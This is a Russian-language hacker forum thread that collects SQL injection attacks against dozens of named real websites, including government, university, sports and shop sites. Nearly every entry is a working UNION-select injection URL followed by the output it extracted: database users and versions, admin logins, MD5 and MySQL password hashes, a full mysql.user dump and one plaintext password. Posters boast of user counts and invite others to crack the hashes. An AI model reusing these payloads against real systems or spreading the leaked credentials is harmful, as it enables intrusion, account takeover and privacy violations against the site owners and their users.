SQL Инъекции

zdorovie-tv.ru

4.0.23-standard
root:2d8373280041e026:ctvm

 

Code:

http://www.exmormon.org/boards/w-agora/index.php?site=exmobb&cat=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20,21,22,23,concat(userid,0x3a,password),24/**/FROM/**/agora_users/*

debugadmin:d52dee500ff126055ad85eb2ef2a37e4

 

sportpiac.hu

HTML:

http://www.sportpiac.hu/index.php?oldal=katalogus&forgalmazo=7+union+select+0,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),2,3,4,5,6,7,8/*

filemon@localhost:5.0.44-log:sportpiac

HTML:

http://www.sportpiac.hu/index.php?oldal=katalogus&forgalmazo=7+union+select+0,table_name,2,3,4,5,6,7,8+from+information_schema.tables/*

- таблици

HTML:

http://www.sportpiac.hu/index.php?oldal=katalogus&forgalmazo=7+union+select+0,concat(column_name),2,3,4,5,6,7,8+from+information_schema.columns+limit+1,100/*

- столбци

HTML:

http://www.sportpiac.hu/index.php?oldal=katalogus&forgalmazo=7+union+select+0,concat(id,0x3a,user,0x3a,pass),2,3,4,5,6,7,8+from+users/*

HTML:

http://www.sportpiac.hu/index.php?oldal=katalogus&forgalmazo=7+union+select+0,concat(id,0x3a,user_login,0x3a,user_pass),2,3,4,5,6,7,8+from+wp_users/*

HTML:

http://www.sportpiac.hu/admin/

1:admin:21232f297a57a5a743894a0e4a801fc3:admin
3:filemon:1a1dc91c907325c69271ddf0c944bc72ass

 

http://www.singletrackworld.co.uk/article.php?sid=-16+union+select+1,2,concat_ws(char(58),name,pass,email),4,5,6,7,8,9+from+users/*
Проверил по антибояну...там был этот сайт, но только .com....так что не в счет))
-----------------------------------------------------------------------
http://www.digitaltouch.co.uk/article.php?ID=-2+union+select+1,2,3,concat_ws(0x2f,version(),user(),database()),5/*
4.0.27-standard/digitalt_jeffbrf@localhost/digitalt_digitaltouch
-----------------------------------------------------------------------
http://www.atlvalsesiavercelli.it/article.php?id=-1+union+select+CONVERT(concat_ws(0x3a,version(),user(),database())+using+latin1)/*
4.1.11-Debian_4sarge8-log:atl@localhost:atl_valsesia

 

http://www.petsby.com/dogs_list.php?page=1&group_id=-1/**/union/**/select/**/concat_ws(char(124),username,user_password)/**/from/**/forum_users/**/limit/**/1,1/*

Admin|e1df5c96bad252401b022d71f1c83d5e
Вот только не расшифровываеться ((

 

Code:

http://www.snami.pisa.it/show_new.php?id=-99+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8+from+users/*

Code:

http://www.ciag.com.gt/show_new.php?id=-6+union+select+1,VERSION(),3,4,5,6,7/*

 

Toxic, http://forum.xakep.ru/m_1024319/printable.htm

Admin:13042006

 

крупный сайт

http://groove.ru/?user=Dana&p=pages&id=-352+union+select+1,concat(user_name,0x3a,user_pass,0x3a,user_email)+from+groove_user+limit+0,1/*


http://groove.ru/?user=Dana&p=pages&id=-352+union+select+1,concat(admin_name,0x3a,admin_pass)+from+groove_admin/*

юзеров больше 24000 шт

_________________________________
секес )))

http://sexsecrets.ru/?r=enciklopedia&id=-176+union+select+1,concat(user_email,0x3a,username,0x3a,user_password),3+from+phpbb_users+limit+1,1/*

-писюн.ру

http://www.pisun.ru/?price=a&price_max=&sel_metro=-27+union+select+1,2,3,4,5,6,7,8,9,10,11,version(),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102/*

5 мускул

_________________________________

http://www.price-list.kiev.ua/cgi-bin/price_img_info.cgi?id=-3901576+union+select+1,cast(concat(email,0x3a,pass)+as+binary),3,4,5+from+users+limit+0,1/*

_________________________________

видео магазины

http://www.home-dvd.info/details.php?Id=16749+union+select+concat(email,0x3a,pwd)+from+users+limit+10,10/*


http://www.foxmovies.ru/index.php3?id=-10595+union+select+1,2,3,4,5,concat(nick,0x3a,passwd),7,8,9+from+_user+limit+0,1/*

_________________________________

туроператор

http://www.mirtour.ru/about/news/?id=-37+union+select+1,2,3,4,concat(manager,0x3a,managerpass),6,7,8,9+from+discont_managers+limit+2,1/*

 

http://www.samopoznanie.com/printarticle.php?id=-1+union+select+1,concat_ws(0x2f,version(),user(),database()),3,4,5/*
4.0.23a-log/lidia@localhost/samopoznanie

 

PHP:

http://www.2016usgirlsjunior.org/questions/faqs/handicap_answer.asp?FAQidx=15'+group+by+1--

PHP:

http://www.2016usgirlsjunior.org/questions/faqs/handicap_answer.asp?FAQidx=15'+or+1=1--

Вроде инъёкция есть, но group by, order by, union почему то не работают.. (

 

evrofasad.com.ua

Code:

http://www.evrofasad.com.ua/81?printID=-1+union+select+concat_ws(0x3a,version(),database(),user()),2/*&PHPSESSID=unsbr5mn81q16grk03l43fonh6

4.1.20-community-nt:db_evrofasad_new:evrofasad_user@localhost

Code:

http://www.evrofasad.com.ua/81?printID=-1+union+select+concat_ws(0x3a,user,password),2+from+mysql.user+limit+0,1/*&PHPSESSID=unsbr5mn81q16grk03l43fonh6

Code:

root:*F9412D7E95AC1E517BBDEA70B0CDA1C3A954DBA5
eurofasad:*685A8769F0EFB1A0358699E09AECB47216F2FA60
evrofasad_user:*E594B415CBFCBCBE92DE48810E7442D7E9925964
sofit:*A75C7664FF4013AC928FE355BE7BEE313295EF15
loginforum:*76A5D146549860B09B9BC8C529EDF05D95A96E90
backuper:*759E70BE56B564382083D276339AC5F660332A1C
svetofor:*F185EF1C8A14114439937712A796759943FE4C7D
viknauser:*C9EE7E827518FBB0B6452F32A3A0E74EE4348DA6
dblussole:*8303224CA73F32E099ED4D5589372A48847A4ADC
sofit_forum:*C010E6C07BCD31C8EE45D04093BB1C50A3BE7981
svt:*917B41A42ED3307B057D4462776BE6D22191E471
efplast:*890244829E7E1073887CD3BE4F3DD40ED1AE65CC
delux:*D5876B1B1A4A3233F51317EFA97D9CD60E571AA0
claroline:*6C14E3D8CE32929711BCBB4C2F7CA95EA7B2A221
integral:*6020723CC8C46038FB7E9D29E26E50357695DA69
svitkomfortu:*C0842FED9DED84F798E19B4DFAEAEC1DA180EB38
drupal:*7AFEAE5774E672996251E09B946CB3953FC67656
houses:*7EAE149B76900876ABD03DD1E4281B218A9D47F3
test:*94BDCEBE19083CE2A1F959FD02F964C7AF4CFC29
lussoleforum:*40E10559E7BA57D182650F9AFDBFA12084402352
poselok_db_user:*A652F43B1179494CF8ED2EA752C86416540A8041
joomla:*F70658E9BDD2910AC33ACDA164605DFC1DA70A68

 

ccn-usa.net

Code:

http://www.ccn-usa.net/contents.php?typeid=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5/*

4.0.23-standard:ccnusa:ccnusa@localhost

hamsy.net - походу финский спорт-сайт

Code:

http://www.hamsy.net/uutinen.php?id=-1+union+select+null,concat_ws(0x3a,version(),database(),user()),null,null,null,null/**/

PostgreSQL
5.0.51-Dotdeb_0.dotdeb.1-log:db17112:[email protected]

Code:

http://www.hamsy.net/uutinen.php?id=-1+union+select+null,TABLE_NAME,null,null,null,null+from+INFORMATION_SCHEMA.TABLES+limit+1+offset+25--

Табы (кроме стандартных):

Code:

calendar,chat,links,news,results,team,teamuser,valikko,visitor

 

order.elite-games.ru

Code:

http://www.order.elite-games.ru/article.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*

4.1.21-community-nt : order : order@localhost

Таба oeg_users :

Code:

http://www.order.elite-games.ru/article.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,login,passwd,email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+oeg_users+limit+273,1/*

Админ [логин : МД5(пасс)] :
admin : baf2c85699402cad6c8d9ff73892376f

 

http://www.qp7.ru ip:81.176.66.38
У них по-соседству(а может - на их системе) сидит MTS.ru!!! ip:81.176.70.200

http://www.qp7.ru/live/newscomp.aspx?nid=5133+or+1=(select+db_name())--

 

doprava.vhd.cz

HTML:

http://doprava.vhd.cz/list.php?cc=-1+union+select+0,concat(USER(),0x3a,VERSION(),0x3a,DATABASE())/*

[email protected]:4.1.22-log:doprava_vhd_cz

meteonews.fr

HTML:

http://www.meteonews.fr/index.php?page=wetter_pwl&lang=en&wetter_pwl=-1+union+select+0,1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),3,4,5,6,7,8/*

[email protected]:5.0.44-enterpris

db.seoulprinting.com

HTML:

http://db.seoulprinting.com/sub/sub_01.php?sub=1&mid=-1550+union+select+0/*

 

proexmotorsport.liveforspeed.hu

HTML:

http://proexmotorsport.liveforspeed.hu/index.php?headlinesid=999999+union+select+0,1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*

proex_web@localhost:4.0.22-ntroex_web

HTML:

http://proexmotorsport.liveforspeed.hu/index.php?headlinesid=999999+union+select+0,1,2,concat(password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+from+members/*

pass: 96w9sFSaaPqGQ
foodcentrale.com

HTML:

http://foodcentrale.com/suche/detail/index.php?index=-860011151+union+select+concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),1/*

[email protected]:5.0.27:foodcentrale

HTML:

http://foodcentrale.com/suche/detail/index.php?index=-860011151+union+select+table_name,1+from+information_schema.tables+limit+10,100/*

- названия таблиц

HTML:

http://foodcentrale.com/suche/detail/index.php?index=-860011151+union+select+column_name,1+from+information_schema.columns/*

- названия столбцов

HTML:

http://foodcentrale.com/suche/detail/index.php?index=-860011151+union+select+concat(user),1+from+fc_basket_user/*

 

http://www.maineservicecommission.gov/news/release.php?ID=-252+union+select+1,2,version(),database(),user(),6,7,8,9,10,11,12/*



http://www.mainelobsterfestival.com/release.php?ID=-13+union+select+1,2,3,version(),user(),6,database(),8,9,10,11,12/*

http://www.wishard.edu/news/release.php?id=-38+union+select+1,version(),database(),4,user(),6/*

http://www.integralwireless.net/news_media/release.php?id=-13+union+select+1,version(),database(),4,5,user(),7,8,9/*

http://www.peyron.com/release.php?id=-26+union+select+1,2,3,concat(version(),user()),database(),6,7,8/*

http://www.daltonagency.com/release.php?id=-51+union+select+1,user,password,4,5,6,7+from+mysql.user/*

http://www.playavista.com/about/news/release.php?id=-18+union+select+1,2,3,4,5,6,convert(concat_ws(0x3b,password,user,database())using%20latin1),8+from+mysql.user/*

http://www.camdenme.org/news/release.php?ID=-63+union+select+1,2,3,4,user(),database(),7,8,9,10,11,12,13,14,version()/*

 

Code:

http://echl.leaguestat.com/stats/player.php?id=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,concat_ws(0x3a,user,password)r,36+from+mysql.user/*

[email protected]:echl:5.0.22-log

Code:

http://brmp3.com/player.php?id=99999+union+select+1,2,3,concat_ws(0x3a,username,password),5,6+from+users+limit+1,1/*

brmp3_mp3@localhost:brmp3_mp3:4.1.22-standard

Code:

http://www.ldmstudio.com/go/players.php?id=99999+union+select+1,2,3,4,5,6,7+from+admin/*

ldm@localhost:ldm_prima:5.0.45-community-log

Code:

http://www.nkzagreb.hr/news.php?id=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*

nkzagrebhr@localhost:nkzagreb:4.1.11-Debian_4sarge7-log

Code:

http://www.mlb-players.com/players/players.php?id=99999+union+select+1,2,3,4,table_name,6+from+INFORMATION_SCHEMA.TABLES+limit+0,1/*

mlbplaye_stats@localhost:mlbplaye_stats:5.0.45-community

Code:

http://www.metalistfans.net/players.php?id=99999+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user(),database(),version()),9/*

metalistfans@localhost:metalistfans:4.0.27-log

Code:

http://www.elitegolfmanagement.com/Players.php?id=99999+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()),8,9,10,11,12,13,14,15/*

[email protected]:elitegol_database:5.0.45-log

 

HTML:

http://www.cdma.uz/index.php?action=news&news_id=608+union+select+1,login,passw,4,5,6,7,8,9,10,11+from+cms_admins/*

admin: cdmadmin
password: 9622f76499e8588addb05838587a8e8f (росшифровуйте кому нада =))

 

Code:

http://www.macworld.it/showPage.php?template=notizie&id=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*

редикт . . . .